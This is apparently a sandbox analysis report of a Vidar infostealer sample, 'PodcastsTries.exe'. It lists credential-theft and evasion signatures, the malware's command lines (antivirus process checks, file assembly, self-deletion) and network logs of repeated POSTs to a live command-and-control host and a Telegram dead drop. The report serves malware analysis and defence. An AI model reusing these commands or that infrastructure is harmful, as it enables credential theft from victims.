Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

1

PodcastsTries.exe

windows7-x64

10

PodcastsTries.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    40s
  • max time network
    39s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    24/12/2024, 07:56 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    PodcastsTries.exe

  • Size

    1.2MB

  • MD5

    20bef33e4a0add922ae043e2aed13ea2

  • SHA1

    4d0353be8234f56862b7ea7ece4ded3eeef91cbb

  • SHA256

    847c28adfa050608203f206d31cce27f1f27e89ab138908473c8c69ccf388ca2

  • SHA512

    7a387b96497c0026d01820e586e4d0a9686b9927c3270a18170a1e5c138dc8bbee759bed63058fdc865a613956ca7258f7058a6fff78a156f85d6d9a8421c469

  • SSDEEP

    24576:Fx9yUoL9cVIpol/OQy1HvVrQaygJy/LilXabJUbsVF1M2/y:X9loLhpWIHtUvgyz4KbJYsVzy

Score
10/10
vidarcredential_accessdiscoveryspywarestealer

Malware Config

Signatures

  • Detect Vidar Stealer 4 IoCs
    stealer
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

    stealervidar
  • Vidar family
    vidar
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Deletes itself 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

    spywarestealer
  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

    credential_accessstealer
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Enumerates processes with tasklist 1 TTPs 2 IoCs
    discovery
  • Drops file in Windows directory 8 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 14 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
    evasion
  • Suspicious behavior: EnumeratesProcesses 20 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of FindShellTrayWindow 3 IoCs
  • Suspicious use of SendNotifyMessage 3 IoCs
  • Suspicious use of WriteProcessMemory 39 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\PodcastsTries.exe
    "C:\Users\Admin\AppData\Local\Temp\PodcastsTries.exe"
    1⤵
    • Checks computer location settings
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:5104
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c move Assessing Assessing.cmd & Assessing.cmd
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:1736
      • C:\Windows\SysWOW64\tasklist.exe
        tasklist
        3⤵
        • Enumerates processes with tasklist
        • System Location Discovery: System Language Discovery
        • Suspicious use of AdjustPrivilegeToken
        PID:3752
      • C:\Windows\SysWOW64\findstr.exe
        findstr /I "opssvc wrsa"
        3⤵
        • System Location Discovery: System Language Discovery
        PID:1104
      • C:\Windows\SysWOW64\tasklist.exe
        tasklist
        3⤵
        • Enumerates processes with tasklist
        • System Location Discovery: System Language Discovery
        • Suspicious use of AdjustPrivilegeToken
        PID:2812
      • C:\Windows\SysWOW64\findstr.exe
        findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
        3⤵
        • System Location Discovery: System Language Discovery
        PID:4640
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c md 680662
        3⤵
        • System Location Discovery: System Language Discovery
        PID:2528
      • C:\Windows\SysWOW64\extrac32.exe
        extrac32 /Y /E Memo
        3⤵
        • System Location Discovery: System Language Discovery
        PID:4104
      • C:\Windows\SysWOW64\findstr.exe
        findstr /V "OBTAINING" Compensation
        3⤵
        • System Location Discovery: System Language Discovery
        PID:4336
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c copy /b ..\Honey + ..\Biotechnology + ..\Enzyme + ..\Harvard T
        3⤵
        • System Location Discovery: System Language Discovery
        PID:1588
      • C:\Users\Admin\AppData\Local\Temp\680662\Billion.com
        Billion.com T
        3⤵
        • Checks computer location settings
        • Deletes itself
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Checks processor information in registry
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SendNotifyMessage
        • Suspicious use of WriteProcessMemory
        PID:60
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\Admin\AppData\Local\Temp\680662\Billion.com" & rd /s /q "C:\ProgramData\QQI5XT2689RI" & exit
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:1464
          • C:\Windows\SysWOW64\timeout.exe
            timeout /t 10
            5⤵
            • System Location Discovery: System Language Discovery
            • Delays execution with timeout.exe
            PID:1352
      • C:\Windows\SysWOW64\choice.exe
        choice /d y /t 5
        3⤵
        • System Location Discovery: System Language Discovery
        PID:4472

Network

  • flag-us
    DNS
    13.86.106.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    13.86.106.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    14.160.190.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    14.160.190.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    133.130.81.91.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    133.130.81.91.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    95.221.229.192.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    95.221.229.192.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    NsxXzupCMoDsL.NsxXzupCMoDsL
    Billion.com
    Remote address:
    8.8.8.8:53
    Request
    NsxXzupCMoDsL.NsxXzupCMoDsL
    IN A
    Response
  • flag-us
    DNS
    196.249.167.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    196.249.167.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    241.150.49.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    241.150.49.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    t.me
    Billion.com
    Remote address:
    8.8.8.8:53
    Request
    t.me
    IN A
    Response
    t.me
    IN A
    149.154.167.99
  • flag-nl
    GET
    https://t.me/k04ael
    Billion.com
    Remote address:
    149.154.167.99:443
    Request
    GET /k04ael HTTP/1.1
    Host: t.me
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.18.0
    Date: Tue, 24 Dec 2024 07:56:52 GMT
    Content-Type: text/html; charset=utf-8
    Content-Length: 12300
    Connection: keep-alive
    Set-Cookie: stel_ssid=cbcf4f097c09d3e5eb_11856170444056257155; expires=Wed, 25 Dec 2024 07:56:52 GMT; path=/; samesite=None; secure; HttpOnly
    Pragma: no-cache
    Cache-control: no-store
    X-Frame-Options: ALLOW-FROM https://web.telegram.org
    Content-Security-Policy: frame-ancestors https://web.telegram.org
    Strict-Transport-Security: max-age=35768000
  • flag-us
    DNS
    bijutr.shop
    Billion.com
    Remote address:
    8.8.8.8:53
    Request
    bijutr.shop
    IN A
    Response
    bijutr.shop
    IN A
    188.245.216.205
  • flag-de
    GET
    https://bijutr.shop/
    Billion.com
    Remote address:
    188.245.216.205:443
    Request
    GET / HTTP/1.1
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
    Host: bijutr.shop
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Date: Tue, 24 Dec 2024 07:56:52 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
  • flag-us
    DNS
    99.167.154.149.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    99.167.154.149.in-addr.arpa
    IN PTR
    Response
  • flag-de
    POST
    https://bijutr.shop/
    Billion.com
    Remote address:
    188.245.216.205:443
    Request
    POST / HTTP/1.1
    Content-Type: multipart/form-data; boundary=----AAAAIMY5PH47QQ9ZM79H
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
    Host: bijutr.shop
    Content-Length: 255
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Date: Tue, 24 Dec 2024 07:56:53 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
  • flag-de
    POST
    https://bijutr.shop/
    Billion.com
    Remote address:
    188.245.216.205:443
    Request
    POST / HTTP/1.1
    Content-Type: multipart/form-data; boundary=----ZM7Q1DTJW4E37Q9ZCBA1
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
    Host: bijutr.shop
    Content-Length: 299
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Date: Tue, 24 Dec 2024 07:56:54 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
  • flag-us
    DNS
    205.216.245.188.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    205.216.245.188.in-addr.arpa
    IN PTR
    Response
    205.216.245.188.in-addr.arpa
    IN PTR
    static205216245188clients your-serverde
  • flag-us
    DNS
    e5.o.lencr.org
    Billion.com
    Remote address:
    8.8.8.8:53
    Request
    e5.o.lencr.org
    IN A
    Response
    e5.o.lencr.org
    IN CNAME
    o.lencr.edgesuite.net
    o.lencr.edgesuite.net
    IN CNAME
    a1887.dscq.akamai.net
    a1887.dscq.akamai.net
    IN A
    88.221.134.137
    a1887.dscq.akamai.net
    IN A
    88.221.134.89
    a1887.dscq.akamai.net
    IN A
    88.221.135.105
  • flag-gb
    GET
    http://e5.o.lencr.org/MFMwUTBPME0wSzAJBgUrDgMCGgUABBQeEcDJrP2kU%2B9LL2pzIRVgTVStuQQUmc0pw6FYJq96ekyEWo9ziGCw394CEgNwz8PXImKfnhVNHh00GVNPyQ%3D%3D
    Billion.com
    Remote address:
    88.221.134.137:80
    Request
    GET /MFMwUTBPME0wSzAJBgUrDgMCGgUABBQeEcDJrP2kU%2B9LL2pzIRVgTVStuQQUmc0pw6FYJq96ekyEWo9ziGCw394CEgNwz8PXImKfnhVNHh00GVNPyQ%3D%3D HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    User-Agent: Microsoft-CryptoAPI/10.0
    Host: e5.o.lencr.org
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Content-Type: application/ocsp-response
    Content-Length: 344
    ETag: "B9B42073838921AAFDF1B2D682205E93C3EACD4403D3040271811EE98CA4616F"
    Last-Modified: Mon, 23 Dec 2024 08:55:00 UTC
    Cache-Control: public, no-transform, must-revalidate, max-age=17279
    Expires: Tue, 24 Dec 2024 12:44:52 GMT
    Date: Tue, 24 Dec 2024 07:56:53 GMT
    Connection: keep-alive
  • flag-de
    POST
    https://bijutr.shop/
    Billion.com
    Remote address:
    188.245.216.205:443
    Request
    POST / HTTP/1.1
    Content-Type: multipart/form-data; boundary=----OPZUASJEKF3E3EKX4WTJ
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
    Host: bijutr.shop
    Content-Length: 299
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Date: Tue, 24 Dec 2024 07:56:54 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
  • flag-us
    DNS
    137.134.221.88.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    137.134.221.88.in-addr.arpa
    IN PTR
    Response
    137.134.221.88.in-addr.arpa
    IN PTR
    a88-221-134-137deploystaticakamaitechnologiescom
  • flag-us
    DNS
    168.245.100.95.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    168.245.100.95.in-addr.arpa
    IN PTR
    Response
    168.245.100.95.in-addr.arpa
    IN PTR
    a95-100-245-168deploystaticakamaitechnologiescom
  • flag-de
    POST
    https://bijutr.shop/
    Billion.com
    Remote address:
    188.245.216.205:443
    Request
    POST / HTTP/1.1
    Content-Type: multipart/form-data; boundary=----H47YMOPPPH4E37Q9R9R1
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
    Host: bijutr.shop
    Content-Length: 300
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Date: Tue, 24 Dec 2024 07:56:55 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
  • flag-de
    POST
    https://bijutr.shop/
    Billion.com
    Remote address:
    188.245.216.205:443
    Request
    POST / HTTP/1.1
    Content-Type: multipart/form-data; boundary=----V3E3OP8QIMOZUAIMOHVS
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
    Host: bijutr.shop
    Content-Length: 299
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Date: Tue, 24 Dec 2024 07:56:56 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
  • flag-de
    POST
    https://bijutr.shop/
    Billion.com
    Remote address:
    188.245.216.205:443
    Request
    POST / HTTP/1.1
    Content-Type: multipart/form-data; boundary=----MGVK6PPPH4E37YCJMY5F
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
    Host: bijutr.shop
    Content-Length: 299
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Date: Tue, 24 Dec 2024 07:56:57 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
  • flag-de
    POST
    https://bijutr.shop/
    Billion.com
    Remote address:
    188.245.216.205:443
    Request
    POST / HTTP/1.1
    Content-Type: multipart/form-data; boundary=----MGDJMO8GV3WBIMG4EK6X
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
    Host: bijutr.shop
    Content-Length: 299
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Date: Tue, 24 Dec 2024 07:56:57 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
  • flag-us
    DNS
    53.210.109.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    53.210.109.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    171.39.242.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    171.39.242.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    92.12.20.2.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    92.12.20.2.in-addr.arpa
    IN PTR
    Response
    92.12.20.2.in-addr.arpa
    IN PTR
    a2-20-12-92deploystaticakamaitechnologiescom
  • 149.154.167.99:443
    https://t.me/k04ael
    tls, http
    Billion.com
    1.5kB
     19.4kB
     24
    20

    HTTP Request

    GET https://t.me/k04ael

    HTTP Response

    200
  • 188.245.216.205:443
    https://bijutr.shop/
    tls, http
    Billion.com
    1.0kB
     3.0kB
     11
    8

    HTTP Request

    GET https://bijutr.shop/

    HTTP Response

    200
  • 188.245.216.205:443
    https://bijutr.shop/
    tls, http
    Billion.com
    1.4kB
     565 B
     9
    6

    HTTP Request

    POST https://bijutr.shop/

    HTTP Response

    200
  • 188.245.216.205:443
    https://bijutr.shop/
    tls, http
    Billion.com
    1.5kB
     598 B
     9
    7

    HTTP Request

    POST https://bijutr.shop/

    HTTP Response

    200
  • 88.221.134.137:80
    http://e5.o.lencr.org/MFMwUTBPME0wSzAJBgUrDgMCGgUABBQeEcDJrP2kU%2B9LL2pzIRVgTVStuQQUmc0pw6FYJq96ekyEWo9ziGCw394CEgNwz8PXImKfnhVNHh00GVNPyQ%3D%3D
    http
    Billion.com
    467 B
     862 B
     5
    3

    HTTP Request

    GET http://e5.o.lencr.org/MFMwUTBPME0wSzAJBgUrDgMCGgUABBQeEcDJrP2kU%2B9LL2pzIRVgTVStuQQUmc0pw6FYJq96ekyEWo9ziGCw394CEgNwz8PXImKfnhVNHh00GVNPyQ%3D%3D

    HTTP Response

    200
  • 188.245.216.205:443
    https://bijutr.shop/
    tls, http
    Billion.com
    1.5kB
     558 B
     9
    6

    HTTP Request

    POST https://bijutr.shop/

    HTTP Response

    200
  • 188.245.216.205:443
    https://bijutr.shop/
    tls, http
    Billion.com
    2.2kB
     598 B
     10
    7

    HTTP Request

    POST https://bijutr.shop/

    HTTP Response

    200
  • 188.245.216.205:443
    https://bijutr.shop/
    tls, http
    Billion.com
    1.5kB
     558 B
     9
    6

    HTTP Request

    POST https://bijutr.shop/

    HTTP Response

    200
  • 188.245.216.205:443
    https://bijutr.shop/
    tls, http
    Billion.com
    1.4kB
     518 B
     8
    5

    HTTP Request

    POST https://bijutr.shop/

    HTTP Response

    200
  • 188.245.216.205:443
    https://bijutr.shop/
    tls, http
    Billion.com
    1.4kB
     518 B
     8
    5

    HTTP Request

    POST https://bijutr.shop/

    HTTP Response

    200
  • 8.8.8.8:53
    13.86.106.20.in-addr.arpa
    dns
    71 B
     157 B
     1
    1

    DNS Request

    13.86.106.20.in-addr.arpa

  • 8.8.8.8:53
    14.160.190.20.in-addr.arpa
    dns
    72 B
     158 B
     1
    1

    DNS Request

    14.160.190.20.in-addr.arpa

  • 8.8.8.8:53
    133.130.81.91.in-addr.arpa
    dns
    72 B
     147 B
     1
    1

    DNS Request

    133.130.81.91.in-addr.arpa

  • 8.8.8.8:53
    95.221.229.192.in-addr.arpa
    dns
    73 B
     144 B
     1
    1

    DNS Request

    95.221.229.192.in-addr.arpa

  • 8.8.8.8:53
    NsxXzupCMoDsL.NsxXzupCMoDsL
    dns
    Billion.com
    73 B
     148 B
     1
    1

    DNS Request

    NsxXzupCMoDsL.NsxXzupCMoDsL

  • 8.8.8.8:53
    196.249.167.52.in-addr.arpa
    dns
    73 B
     147 B
     1
    1

    DNS Request

    196.249.167.52.in-addr.arpa

  • 8.8.8.8:53
    241.150.49.20.in-addr.arpa
    dns
    72 B
     158 B
     1
    1

    DNS Request

    241.150.49.20.in-addr.arpa

  • 8.8.8.8:53
    t.me
    dns
    Billion.com
    50 B
     66 B
     1
    1

    DNS Request

    t.me

    DNS Response

    149.154.167.99

  • 8.8.8.8:53
    bijutr.shop
    dns
    Billion.com
    57 B
     73 B
     1
    1

    DNS Request

    bijutr.shop

    DNS Response

    188.245.216.205

  • 8.8.8.8:53
    99.167.154.149.in-addr.arpa
    dns
    73 B
     166 B
     1
    1

    DNS Request

    99.167.154.149.in-addr.arpa

  • 8.8.8.8:53
    205.216.245.188.in-addr.arpa
    dns
    74 B
     133 B
     1
    1

    DNS Request

    205.216.245.188.in-addr.arpa

  • 8.8.8.8:53
    e5.o.lencr.org
    dns
    Billion.com
    60 B
     175 B
     1
    1

    DNS Request

    e5.o.lencr.org

    DNS Response

    88.221.134.137
    88.221.134.89
    88.221.135.105

  • 8.8.8.8:53
    137.134.221.88.in-addr.arpa
    dns
    73 B
     139 B
     1
    1

    DNS Request

    137.134.221.88.in-addr.arpa

  • 8.8.8.8:53
    168.245.100.95.in-addr.arpa
    dns
    73 B
     139 B
     1
    1

    DNS Request

    168.245.100.95.in-addr.arpa

  • 8.8.8.8:53
    53.210.109.20.in-addr.arpa
    dns
    72 B
     158 B
     1
    1

    DNS Request

    53.210.109.20.in-addr.arpa

  • 8.8.8.8:53
    171.39.242.20.in-addr.arpa
    dns
    72 B
     158 B
     1
    1

    DNS Request

    171.39.242.20.in-addr.arpa

  • 8.8.8.8:53
    92.12.20.2.in-addr.arpa
    dns
    69 B
     131 B
     1
    1

    DNS Request

    92.12.20.2.in-addr.arpa

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\680662\Billion.com
    Filesize

    925KB

    MD5

    62d09f076e6e0240548c2f837536a46a

    SHA1

    26bdbc63af8abae9a8fb6ec0913a307ef6614cf2

    SHA256

    1300262a9d6bb6fcbefc0d299cce194435790e70b9c7b4a651e202e90a32fd49

    SHA512

    32de0d8bb57f3d3eb01d16950b07176866c7fb2e737d9811f61f7be6606a6a38a5fc5d4d2ae54a190636409b2a7943abca292d6cefaa89df1fc474a1312c695f

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\680662\T
    Filesize

    283KB

    MD5

    aee70d72706e4448cd9bb63916c2fb70

    SHA1

    b1b973d61b3e8fb6e8c15a5096f3189307d436c9

    SHA256

    6fef118ae00bc96cd5d4e47c831a683342bd838c2cde5ca6a70c907a88f25e0f

    SHA512

    e74f1bcd95823a94a80f90624b98c57f1ac6d5ca7fe2f1fa2e62936882c66b19e804c5b93f040b15beb82a0a8c8de6125c7a4201838127b0a475778121ccb8df

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\Alarm
    Filesize

    132KB

    MD5

    13a2635497f70d3d361cb002e767d98f

    SHA1

    1e87e1a3dce0f80f70f6cb94f0825c7a6a707325

    SHA256

    733d061aafb568c70df42cb730fd2077192ae87386d0a15cc029616f4e3bdc55

    SHA512

    27d9f84646b7ba6ac5c3323339b6cfc3a5798e01a9ea69de0d0048b1b06562de27a6e85568b26bdb059ef5c1bdc8ab287152b5b8355872a0ac90d1c2521654b5

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\Ana
    Filesize

    81KB

    MD5

    e1172435d03594f9679fe60a14e30199

    SHA1

    20029de30935943707446474f606dde5f4cc49c7

    SHA256

    b4c00d09a27d96bf3f0963c09299a6c3b5839c151d2e49291299a749c189b95a

    SHA512

    ebff9ce05eb9cc7bab03ffcdf8f6f44b5df83849e53a93ef5f6843eda2bc1a38e651dfdbe14d1d9103b06fb77857b08958145c62413ad9ccacb96ea652c68961

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\Assessing
    Filesize

    8KB

    MD5

    1a3d71246d4efca4aa005e013b7680cf

    SHA1

    a171887269f1f331eba1eb0084f3d5526aa89a52

    SHA256

    ca033ef4c6bae09e2b6492b881454409c962b89e1b5e7b8a59914eaa72daec45

    SHA512

    d413b8f9891a95b8483ad10ee7e20317db2d286b3806fcb407f9e1c592cd67e411d78f82b3efc8fd875a66276cf6c5d405425b3d7897ae59ae1c34e6ea88e052

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\Biotechnology
    Filesize

    68KB

    MD5

    f0cf3a7260c8d6f7fed49ed8a8e2db62

    SHA1

    a526b2247d3ca5e94327f0e790a8b1c402604d15

    SHA256

    31c1246a4cfb9667f9c36ceac2b5060dc12eb871215a2452ffba709c783122bc

    SHA512

    dca64511b80d3c1d508b9a22bf92e8f07b209b867c55343e095423d59a90ca0a5a36fcdcd98c300e997850b64bec8046be1e8e150ca47809c951e1c0c032c5d4

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\Compensation
    Filesize

    528B

    MD5

    8e1bfd84abbd93e396b7eb834370563f

    SHA1

    3f08086eb5c5c56202606cf98f3337c39c4fca63

    SHA256

    8a91ee541db819325e37068db7ec112d6713f1bdbbfb6599cc5f93409aafa8af

    SHA512

    add592639ae154dd30e3bd10149def542e15ed1644afe0228af2488e7aa0233adcd06aaae48e92741c383b23b8026d1c8be2b32687e65e07bd99b262296f07a8

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\Enzyme
    Filesize

    89KB

    MD5

    e55e49c9c9654822ebcf66f646aa1807

    SHA1

    b43d0b12490073e8006c41019311c2bce71faf3a

    SHA256

    e3e47c5af4df600b306067ea0fb0edbde366da0adafbc4846259f0b8e193c868

    SHA512

    33e308d477bd5d99905cbc6dff527c360dd87a85d9854e992cb7779e27f4278c0cfe72cbd1068fe256ccb628f40e4c8918bb5199baea24408920cea3f6113a10

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\Harvard
    Filesize

    70KB

    MD5

    cdd966e83ca5f20e6307375facf3d8df

    SHA1

    bff4dde0c3f4ddbea78f4c7046200f492c75b49f

    SHA256

    ab1f5070e1d6e92c6e6bf653119546f90abd9e91cffd248d2394e86588a8ffad

    SHA512

    cfccf7ff1e7b1fb4d3f7578ea4b21be0c07ac7a9d35e78feead9fe5bbdaad02285979fa999260c0ae9e694b0b36029f85f797c40ff0f5c190f8cd31818033f18

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\Honey
    Filesize

    56KB

    MD5

    207bb64422a97810f4f806ba44b76725

    SHA1

    b9cce4855f79c9bafd56cb9025af4e12451ff1ae

    SHA256

    1f3f9acf2ef4473687e1e986406bb44fbdeffcff76ced7a034ecd3d2763187b0

    SHA512

    c6f1a4a20caca09f0249b8157897b3b8123129ceaee9c015f6fb3f2b39a57260510ad313cc8e4c01b458df512a223af8664cc40aed7788a20f3d5cd16e615e2f

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\Hotels
    Filesize

    59KB

    MD5

    ffb68ff89889e9965e528019d1e976f1

    SHA1

    7d285b29e9dc3c954a64479efdc3b554c89ec988

    SHA256

    9a55913d254693465e5013c2cb36c4e09b04cf00a3c39c14e5e21a61abe311a9

    SHA512

    d10a74acd3dcd99312213cb7d167dc3f0dfaaae0cf66cabd721762411d2901d181de9558677621be173cfe7e0827de936b9ee9e618cb6cdd7d6f70fed1b3e782

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\Imported
    Filesize

    110KB

    MD5

    e31c33dbe20b6a1dd992687a23959a12

    SHA1

    03f272995cb57cf0189367cb60ba718daf6310e5

    SHA256

    a238084b94293c59a4dbf0b8748b3241d859355269ef7b4daafc6cd26f8033e9

    SHA512

    5240e18828a76991d1946330bf40a8306cc3db8a11736f3d380c2855acc16537e27571172c9e8b03d13fedc9b7da3289f414a040398b7d10344286e1f7c32973

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\Inside
    Filesize

    101KB

    MD5

    d8f5eaf8f6342d4f4d85503ca4d301ef

    SHA1

    3ba8b23cab4afb7558dae86e36cd99e34302a96b

    SHA256

    aa9cd7a25b03d039a8cd442097b57815e3325bf581bb5061fe8d97f1151b825f

    SHA512

    6ee44a9776030d0e5c63b124cca4e06b5c04fd32fdd6ba9537d59a9cd8159a846897679683c91e24d62e59bb50225267e9084c6144a5e4ce54b2f38462595352

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\Investigations
    Filesize

    67KB

    MD5

    af0ab424e8eedebaad067b7858fea8e8

    SHA1

    60ba0052cdadc2466a1749f97db3dbab5e9251c4

    SHA256

    9e06aecf3d87ebe1db7cced2e5ba280c90d474146a439ef5f2ddb9bee70d56ad

    SHA512

    b2455143eec881ffbdfe29ecba5c26634c3d5dabdb02018c4d4ece6060ebf56a6facb1280a349577af51b7fe85199d33a922a24eff321106fd9dd308c2349a8f

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\Managed
    Filesize

    91KB

    MD5

    9e321dfcce426649c3d616e4e2b75c1d

    SHA1

    02734ebec30a12bfd88bdd050e9ecaa61afee74c

    SHA256

    df97aff410243492a1699143e47d56dcac03f6d75a8ef1b260230da19c43cc52

    SHA512

    9ef758a2a5cec9d0d546a4926b05c99a0ee092ac5dcd8dd1642e5ecf1368ff7197c67cf057d0df0c22ced8be19863be9e3bbc09cb6d54b3dfe636948938acaad

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\Memo
    Filesize

    478KB

    MD5

    6366e6809399935ddf2c3b586966a6ad

    SHA1

    9e4ba3de989dbd0320e9fa1ad58e2dd1f4054e39

    SHA256

    cf8c686a8b0f8c2e5f0df3f21285eafb5967099b0bc7e3656d9cee0ba121014f

    SHA512

    5c7b1373ceb3b2431f26881174f123bfbaf4b97cefed5dcc2c9f891ddf55b27d5280aa7663ee2603bd5a3d2c0240589c11aff4eae8cae731ddedbaef711d4049

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\Modules
    Filesize

    50KB

    MD5

    4ed0758aab64693c1223b86f38e29881

    SHA1

    b0e66408119fa1e9445cd1d96e3bf24f2143640e

    SHA256

    20475df0585b1246382ee087041588a7bc19b50f0215918cc6e75a0490080358

    SHA512

